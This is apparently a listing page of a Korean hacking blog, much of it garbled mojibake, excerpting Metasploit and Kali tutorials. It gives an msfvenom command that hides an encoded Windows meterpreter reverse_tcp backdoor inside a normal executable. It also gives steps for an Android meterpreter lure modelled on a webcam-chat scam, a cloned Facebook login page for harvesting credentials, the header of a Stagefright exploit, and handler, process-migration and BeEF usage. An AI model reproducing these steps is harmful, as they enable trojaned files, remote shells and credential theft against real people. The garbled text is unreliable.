heartbleed.c -o heartbleed -Wl,-Bstatic -ssl -Wl,-Bdynamic -lssl3 .. Metasploit 2016. 12. 21. netool ์ค์น๋ฐฉ๋ฒ(how to install netool) netool = script project ๋ทํด์ ์ค์นํ๊ธฐ ์ํด https://sourceforge.net/projects/netoolsh/ ๋ค์ด๊ฐ๋ฉด ๋ฐ์์ ๊ฐ์ ์ฐฝ์ด ๋ฌ๋ค. :) Git -> opensource-kali ๋ฅผ ํด๋ฆญํ๊ฒ ๋๋ฉด ๋ฐ์ผ๋ก ์ญ์ญ ๋ด๋ฆฌ๋ฉด ์ค์น๋ฐฉ๋ฒ์ด ๋ฌ๋น :) ์์ธํ๊ฑด ์ ํ๋ธ๋ก Metasploit/Kali & Backtrack 2016. 12. 16. ์์ฆ ์ ํ ํ๋ ๋ชธ์บ (๊ธฐ์ด๋ฐฉ์) ์์ฆ ๋ชธ์บ ์ด ์ ํ์ ํ์๋ค. ๋์ถฉ ์๋ฆฌ๋ฅผ ๋ณด๋ฉด ์ค์นดxx๊ฐ์ ๊ณณ์์ ์ฑํ ์ ํ๋ค๊ฐ ๋ชธ์บ ์ ํ์๊ณ ํ์ผ์ ๋ฐ์ผ๋ผ๊ณ ํ๋ค. (๋ชธ์บ ์ ํ๊ธฐ์ํ ์ ์ฉ ํ์ผ์ด๋ผ ๋ปฅ์ ์น๋ค.) ๊ทธ๋ฌ๊ณ ํ์ผ์ ๋ณด๋ด๋๋ฐ ๊ทธ ํ์ผ์ ๋น์ฐํ ์ ์ฑ์ฝ๋ !! :) ์ด์ ๊ทธ๊ฒ์ ์ฌ์ฐํด๋ณด์ ๊ทธ์ ์ ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.์์ํด๋ณด์ :X ๋จผ์ service apache2 start๋ก ์ํ์น๋ฅผ ์คํ ์์ผ์ฃผ๊ณ service postgresql start ๋ก postgresql ๋ํ ์ํจ๋ค. ๊ถ๊ทน์ ์ธ ๋ช ๋ น์ด service metasploit start ๋ก metasploit ๋ํ ์คํ์ํจ๋ค. ๊ทธ ํ ์ด์ ์ ์ฑ์ฝ๋๋ฅผ ๋ง๋ค์ด์ผ ํ๋๋ฐ...๋ช ๋ น์ด msfvenom์ ์ด์ฉ ํ์ฌ ๋ง๋ค์ด ๋ณด์.msfvenom -p android/meterpreter/.. Metasploit 2016. 12. 15. ํ์ผํฉ์น๊ธฐ (์ ์ฑ์ฝ๋์๋ ํ์ผ๋ง๋ค๊ธฐ) ๋ชจ๋ ์ฌ์ฉ์ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค. msfvenom -a ์ํคํ ์ณ --platform ํ๋ซํผ -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe ํธ๋ค๋ฌ์์ ํ๋ก์ธ์ค ์ฎ๊ธฐ๋ ๋ช ๋ น์ด migrate ํ๋ก์ธ์ค ๋๋ฒ ex) migrate 1111 Metasploit 2016. 5. 24. ๊ฐ์ง facebook๋ง๋ค๊ธฐ ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์ธ์. ๋จผ์ Kali linux or parrot linux์์ ํฐ๋ฏธ๋์ open setoolkit์ ์ ๋ ฅํ๋ค. ์ ๋ ฅ์ ํ๋ฉด ์ด๋ฌํ ์ฐฝ์ ํ์ธ ํ์ค์ ์์ต๋๋ค. ์ฌ๊ธฐ์ Social-Engineering Attacks๋ฅผ ํด์ผํ๊ธฐ ์ํด 1๋ฒ์ ์ ๋ ฅํฉ๋๋ค. ๋ค์์ Website Attack Vectors์ ์ํด 2๋ฒ ์ฌ๊ธฐ์์ Credential Harvester Attack Method๋ฅผ ์ํด 3๋ฒ facebook์ ๋ง๋ค๊ธฐ ์ํด 2๋ฒ์ ํด๋ฆญํฉ๋๋ค. ์ฌ๊ธฐ๊น์ง ํ์ จ์ผ๋ฉด ๋ฐ์์ต๋๋ค. 2๋ฒ์ ํ์ จ์ผ๋ฉด IP๋ฅผ ์ ๋ ฅํ์๋ฉด ๋๋๋ฐ์! ip๋ฅผ ์ ๋ ฅํ๋ฉด ์ด์ cloneํ๊ธฐ ์ํ ์ฌ์ดํธ๋ฅผ ์ ๋ ฅํ์๋ฉด ๋ฉ๋๋ค. ์ ๋ facebook.com์ ํ๊ธฐ์ํด http://faceboo.. Metasploit 2016. 2. 11. stagefright.py ๋ชจ๋ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค.์ฐ๊ตฌ์ฉ์ผ๋ก๋ง ์ฌ์ฉํ์๊ธฐ ๋ฐ๋๋๋ค. #coding: utf-8#!/usr/bin/env python# Fixed By Rizaldi# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs# Shout outs to our friends at Optiv (formerly Accuvant Labs)# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015# www.zimperium.com## Exploit for RCE Vulnerability CVE-2015-1538 #1# Integer Overflow in the libstagefright MP4 'stsc' atom handlin.. Metasploit 2016. 2. 10. postgreSQL? postgreSQL??? service postgresql start Metasploit 2015. 12. 14. kali linux 2.0 apt-get /etc/apt/sources.list deb http://http.kali.org/kali sana main non-free contrib deb http://security.kali.org/kali-security/ sana/updates main contrib non-free Metasploit/Kali & Backtrack 2015. 12. 10. msfvenom ์ฃผ์! ๋ชจ๋ ์ ์์ ์ธ ๋ฒ์ ์ฑ ์์ ์ฌ์ฉ์์๊ฒ ์์ต๋๋ค. ํ ... ์๋ ์๋ msfpayload ๋ผ๋ ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ์ฌ ๋ฐฑ๋์ด๋ ๋ง๋ค์ด ๋ณด๊ณ ํ๋ค.๊ทธ๋ฌ๋ ๋ฐ๋ผ๊ณ ๋ ํ ์ค๋๋ง์ ์จ์ผํด์ ๋ช ๋ น์ด๋ฅผ ํ๋ msfpayload๊ฐ ์๋ฐ์ฌ,,,๊ฒ์๊ฒฐ๊ณผ msfvenom ์ผ๋ก ๋ฐ๊ผ๊ธธ๋ ๋ค์ ๊ณต๋ถ๋ฅผ ํ์๋ค. ์ด์ ์ด๋ฅผ ๊ฐ๋จํ ์ฌ์ฉํด๋ณด์!๋จผ์ ๋ฆฌ์คํธ๋ฅผ ๋ณด๊ธฐ์ํด 1. msfvenom -l ์ด๋ ๊ฒ ๋ฆฌ์คํธ๊ฐ ๋์จ๋ค. ๋ง์ฝ ์๊ธฐ๊ฐ ์ฐ๊ณ ์ถ์ payload๋ฅผ ์ฐพ์๋ค๋ฉด 2. msfvenom -p ์ํ๋ payload -f ํ์ฅ์ > ํ์ผ์ด๋ฆ.ํ์ฅ์ root ํด๋์ ๊ฐ๋ฉด ํ์ผ์ด ์์ฑ๋์ด์๋ค. ์ด์ ํธ๋ค๋ฌ๋ฅผ ํฅํด!! 1. msfconsole 2. use exploit/multi/handler 3. sey payload [payload ๋ช ].. Metasploit 2015. 12. 6. msf ์ด์ฉํ๊ธฐ // beEF ์ฌ์ฉ๋ฒ msfconsole ์ ์ด์ฉํ์ฌ ๋ง์ ์ ๋ณด๋ฅผ ์ฐพ์ ์ ์๋ค.์์์ ๋ณด์ฌ์ค ์ ๋ณด๋ค ๋ฟ์๋๋ผ ์ด๋ฉ์ผ ์ฃผ์๊น์ง ์์๋ผ์ ์๋ค. ํ์ง๋ง msf ์์ฒด๋ ๋ฏธ๊ตญ์ ์ค์ ์ด ๋์ด ํ๊ตญ ์ ๋ณด๋ ๋ง์ด ์๋ค๋ ์ ์ด๋ค... (์ ์์ ์ธ ํ์์ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.) 1. use auxiliary/gather/search_email_collector 2. set domain [๋๋ฉ์ธ] 3. run BeEFBeEF๋ Browser Exploit Framework ๋ก์จ ์ฌ์ฉ์ PC์ ์ ๋ณด ์์ง๋ถํฐ ๊ณต๊ฒฉ๊น์ง ๊ฐ๋ฅํ ๋๊ตฌ์ด๋ค. ์ฃผ๋ก xss(ํฌ๋ก์ค ์ฌ์ดํธ์คํฌ๋ฆฝํธ)๊ณต๊ฒฉ ์ทจ์ฝ์ ์ ์ฐพ๊ธฐ ์ํด ์ฌ์ฉ์ด๋๋ค. ๊ทธ๋ผ xss๋ ๋ฌด์์ผ๊น? ์ด๋ ์น์์ ์ฌ์ฉํ๋ ํด๋ผ์ด์ธํธ ์คํฌ๋ฆฝํธ๋ฅผ ํตํด ํน์ ํ ํ๋์ ์ผ์ผํค๋ ์ทจ์ฝ์ ์ ๋งํ๋ค. beEF ์ค์น!.. Metasploit 2015. 12. 6. ์ด์ 1 2 ๋ค์ 728x90 ๋ฐ์ํ